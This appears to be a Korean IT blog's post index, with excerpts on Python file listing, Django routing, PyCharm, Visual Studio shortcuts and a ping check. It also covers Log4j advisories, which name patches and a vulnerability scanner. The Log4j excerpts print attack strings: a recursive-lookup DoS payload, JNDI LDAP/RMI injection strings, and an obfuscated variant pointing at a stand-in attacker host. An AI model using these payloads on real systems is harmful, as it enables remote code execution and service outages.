로픽의 IT블로그

파일 목록 출력 파일 목록 출력 코드 ( * os.listdir 함수로 파일 정보 불러옴 ) path_dir = 'D:/' #디렉토리 file_list = os.listdir(path_dir) GUI로 파일 목록 출력 ( with. PyQt5 ) import sys, os from PyQt5.QtWidgets import QApplication, QWidget, QTableWidget, QAbstractItemView, QHeaderView, QTableWidgetItem, QVBoxLayout from PyQt5.QtGui import QIcon class MyApp(QWidget): def __init__(self): super().__init__() self.initUI() def initUI(se..

Django URLConf 설정 참고: 생활코딩 Python Django Framework 강의 https://youtu.be/AafeZ6dxMzo 라우팅 순서 (URLConf 설정) 1. Project - urls.py > urlpattern에 path 참고 * path ( "URL 경로", "App urls 지정" ) path('', include('myApp.urls')) 2. App - urls.py > urlpattern에 path 참고 * path ( "URL 경로", "Views 함수명" ) path('', views.index) 3. App- views.py에 페이지 정의 from django.shortcuts import render, HttpResponse # Create your vi..

Pycharm Community Django 실행 Pycharm Communtiy 버전에서 Django를 실행하는 방법 정리 출처 : https://sys09270883.github.io/web/4/ Pycharm에서 Django 프로젝트 생성 Pycharm Community Edition으로 Django 프레임워크 프로젝트 생성 sys09270883.github.io * Pycharm Community Django 프로젝트 실행 1. pycharm 실행 2. 패키지 Install File - setting - project:프로젝트명 - Python Interpreter - Install - django - install package 3. 프로젝트 생성 Terminal - django-admin st..

★ Ctrl 사용 단축키 Ctrl + K + D 들여쓰기 및 정렬 Ctrl + K + C 선택 영역 주석처리 Ctrl + K + U 선택 영역 주석해제 Ctrl + 방향키 위, 아래 마우스 조작없이 화면 위, 아래이동 Ctrl + . (점) 인텔리 센스 작동 ★ Shift 사용 단축키 Shift + alt + 방향키 여러 텍스트 영역 선택 Shift + del 한 줄 지우기 ★ Function 사용 단축키 F9 디버깅용 BreakPoint 설정 F11 한 단계씩 디버깅 F12 클래스 상세보기

Python ping check subprocess.Popen을 이용한 파이썬 핑체크. * 핑체크 출력 실시간 출력이 아닌 4번의 핑체크 후 한번에 결과를 출력함. decode("cp949")를 해줘야 텍스트 깨짐 없이 출력됨.

CVE-2021-45105 PoC / Log4j2 취약점 테스트 CVE-2021-45105 공개 후 해당 취약점에 대한 PoC도 github에 공개되었습니다. 핵심 공격 구문은 ${${::-${::-$${::-$}}}} 입니다. 보안공지 및 기사를 확인했을때 공격자가 'X-Api-Version' 헤더에 특정 문자열(${${::-${::-$${::-$}}}})을 포함한 요청을 대상 서버에 전송하는 경우, log4j에서 로그를 저장하는 과정에서 StackOverFlow 오류를 발생시켜 해당 프로세스가 종료될 수 있다고 합니다. * PoC 테스트 (모바일 환경에서 이미지 확인이 어려울 수 있습니다) - 제공된 환경에서 테스트시 "Infinite loop in Property ....." 란 에러메시지를 출력합..

CVE-2021-45105 / Log4Shell 3번째 신규 취약점 발견 Log4Shell 관련 3번째 신규 취약점이 발견되었습니다. 3번째 취약점의 경우 2번째 발견된 취약점(CVE-2021-45046) 과 유사하게 Dos 공격을 유발한다고 합니다. * 취약점 설명 (벤더사 설명) 로깅 구성에서 컨텍스트 룩업이 포함된 패턴 레이아웃(예: ${ctx:loginId})을 사용하면 MDC(Thread Context Map) 입력 데이터를 제어하는 공격자가 재귀 룩업을 포함하는 악의적인 입력 데이터를 조작하여 프로세스를 종료할 수 있습니다. * 영향 받는 버전 2.0-beta9 ~ 2.16.0 버전 (Log4j 2.12.3 제외) * CVSS Score 7.5(AV:N/AC:L/PR:N/UI:N/S:U/C:N..

Log4Shell 취약점 스캐너 - logpress (CVE-2021-44228 / CVE-2021-45046) 최근 Log4Shell 취약점으로 인한 이슈가 많이 발생하고 있습니다. 지난 주말 최초 발견 후 Log4j2 패치 및 보안솔루션 대응을 하고 있지만 신규 취약점이 발생하였습니다. 최초 발견된 CVE-2021-44228 의 경우 2.15로 패치를 적용하면 문제가 없었으나 신규 발견된 CVE-2021-45046 의 경우 2.16로 패치를 적용해야합니다. 많은 분들이 이미 대응하셨지만 아직 대응하지 못하신 분들은 아래 취약점 점검 스캐너를 사용해보시면 좋을것 같습니다. LogPresso - Log4j2 취약점 점검 스캐너 - Window, Linux, Unix 환경에서 Log4j2 취약 버전 사용 ..

Apache Log4j2 신규 취약점 발견 (CVE-2021-45046) 출처 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 CVE - CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-def cve.mitre.or..

Apache Log4j 2 취약점 (CVE-2021-44228 / Log4Shell) PoC 및 취약점 스캐너 * 공격 구문 형식 - 주요 공격구문 : ${jndi:ldap://xxx.xxx.xxx/z} , ${jndi:rmi://xxx.xxx.xxx/z} - HTTP URL, Header, body에 삽입하여 다수 공격 시도 (Zgrab과 같은 취약점 스캐너를 이동한 자동화 공격) - 대소문자 및 아래와 같은 변형된 형식으로 인입도 가능. ex) ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z} - 출처 : https://github.com/Puliczek/..